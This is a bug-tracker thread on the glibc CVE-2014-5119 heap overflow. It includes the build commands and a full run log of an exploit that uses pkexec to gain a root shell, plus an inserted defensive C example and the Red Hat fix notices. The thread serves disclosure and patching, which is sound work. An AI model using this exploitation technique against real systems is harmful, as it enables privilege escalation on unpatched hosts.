Tavis Ormandy reported an off-by-one error leading to a heap-based buffer overflow flaw in glibc's __gconv_translit_find() function. This could be triggered by setting the CHARSET environment variable to a malicious value. This could possibly lead to code execution as root if a set user ID (setuid) root application used this environment variable without sanitizing its value.

References:
http://www.openwall.com/lists/oss-security/2014/07/14/1
http://www.openwall.com/lists/oss-security/2014/07/14/2
MITRE assigned CVE-2014-5119 to this issue: http://seclists.org/oss-sec/2014/q3/358

Upstream bug: https://sourceware.org/bugzilla/show_bug.cgi?id=17187
*** Bug 1129743 has been marked as a duplicate of this bug. ***
Further information from Tavis Ormandy: https://sourceware.org/ml/libc-alpha/2014-07/msg00590.html
Created attachment 930687 [details]
CVE-2014-5119 exploit for Fedora 20 32-bit

It's been a few months without progress, here's an exploit.

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@localhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pkexploit.c -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pty.c -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c -o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so

Execute pkexploit to attempt exploitation.

[taviso@localhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing /: File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit
Statement: (none)
Reference:
http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
https://code.google.com/p/google-security-research/issues/detail?id=96
Upstream commit: https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=a1a6a401ab0a3c9f15fb7eaebbdcee24192254e8

It removes affected functionality - support for loadable gconv transliteration modules - which was non-functional for a long time.
IssueDescription: An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
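An added defensive example, not code from this bug report or from glibc: a setuid program that never hands an attacker-controlled charset name to iconv_open(), by matching names against a fixed allowlist and dropping the CHARSET variable from its environment before any library code can consult it. The allowlist contents and the function names are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <iconv.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical allowlist of charset names this program is willing to pass
 * to iconv_open(). Anything else, including environment-supplied names with
 * extra suffixes or unusual lengths, is rejected before glibc ever sees it. */
static const char *const allowed_charsets[] = { "UTF-8", "ISO-8859-1", "ASCII", NULL };

/* Accept only an exact, case-sensitive allowlist match; also bound the
 * length so a long name is refused before the string comparison loop. */
bool charset_name_allowed(const char *name)
{
    if (name == NULL || strlen(name) > 32)
        return false;
    for (size_t i = 0; allowed_charsets[i] != NULL; i++)
        if (strcmp(name, allowed_charsets[i]) == 0)
            return true;
    return false;
}

/* In a setuid program, remove the caller-controlled CHARSET variable so that
 * neither this process nor any child it spawns consults it.
 * Returns 0 on success, -1 on failure (same convention as unsetenv()). */
int scrub_charset_env(void)
{
    return unsetenv("CHARSET");
}

/* Open a converter only when both names pass the allowlist. On rejection it
 * returns (iconv_t)-1, the same failure value iconv_open() itself uses, so
 * existing error handling keeps working. */
iconv_t open_allowlisted_converter(const char *to, const char *from)
{
    if (!charset_name_allowed(to) || !charset_name_allowed(from))
        return (iconv_t)-1;
    return iconv_open(to, from);
}
```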
This issue has been addressed in the following products:
Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7

Via RHSA-2014:1110 https://rhn.redhat.com/errata/RHSA-2014-1110.html
This issue has been addressed in the following products:
Red Hat Enterprise Linux 5.6 Long Life
Red Hat Enterprise Linux 5.9 EUS - Server Only
Red Hat Enterprise Linux 6.2 AUS
Red Hat Enterprise Linux 6.4 EUS - Server and Compute Node Only

Via RHSA-2014:1118 https://rhn.redhat.com/errata/RHSA-2014-1118.html